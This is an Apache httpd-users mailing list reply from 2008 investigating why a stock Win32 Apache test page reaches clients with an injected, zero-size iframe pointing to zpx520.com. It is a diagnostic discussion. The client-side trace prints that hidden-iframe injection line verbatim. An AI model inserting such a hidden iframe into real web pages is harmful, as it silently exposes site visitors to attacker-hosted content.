httpd-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Greg Mortensen <thevis...@pobox.com>
Subject Re: [users@httpd] zpx520.com hidden iframe in stock Win32 install?
Date Wed, 18 Jun 2008 19:36:24 GMT
On Wed, 18 Jun 2008, Issac Goldstand wrote:

> Doesn't sound right to me...  I've certainly never noticed it on win32 
> installs, though I don't have an environment to test it myself just now

   I just tried 2.0.63 and the same thing happens.  Using a handful of 
sysinternal tools, I can see the following:

[1] The index.html is read (44 bytes).

[2] A network trace (running on the httpd server) shows that all of the 
HTTP headers and the real index.html go out:

HTTP/1.1 200 OK
Date: Wed, 18 Jun 2008 19:28:31 GMT
Server: Apache/2.2.9 (Win32)
Last-Modified: Sat, 20 Nov 2004 18:16:24 GMT
ETag: "13000000004c24-2c-3e9549efc6e00"
Accept-Ranges: bytes
Content-Length: 44
Connection: close
Content-Type: text/html
X-Pad: avoid browser bug

<html><body><h1>It works!</h1></body></html>

[3] A network trace (on the client) shows that the majority of the HTTP 
headers are thrown away and the iframe element inserted:

HTTP: ----- HyperText Transfer Protocol -----
HTTP:
HTTP: HTTP/1.1 200 OK
HTTP: Content-Length: 265
HTTP: Content-Type: text/html
HTTP:
HTTP: <iframe src='http://www.zpx520.com/0.htm' width=0 height=0></iframe> 
<html><body><h1>It works!</h1></body></html>
HTTP:


"Something" between #2 and #3 is molesting the data.  I haven't figured 
out the "something" yet, but I noticed that this only happens on the server 
running on port 80.  I also noticed that disabling mod_mime causes the 
data to go out properly.

   Regards,
     Greg

  \|/   ___   \|/    thevision@pobox.com    +----- 2048R/38BD6CAB -----+
   @~./'O o`\.~@                            | 02BD EF81 91B3 1B33 64C2 |
  /__( \___/ )__\                           | 3247 6722 7006 38BD 6CAB |
     `\__`U_/'                              +--------------------------+

---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org


Mime
View raw message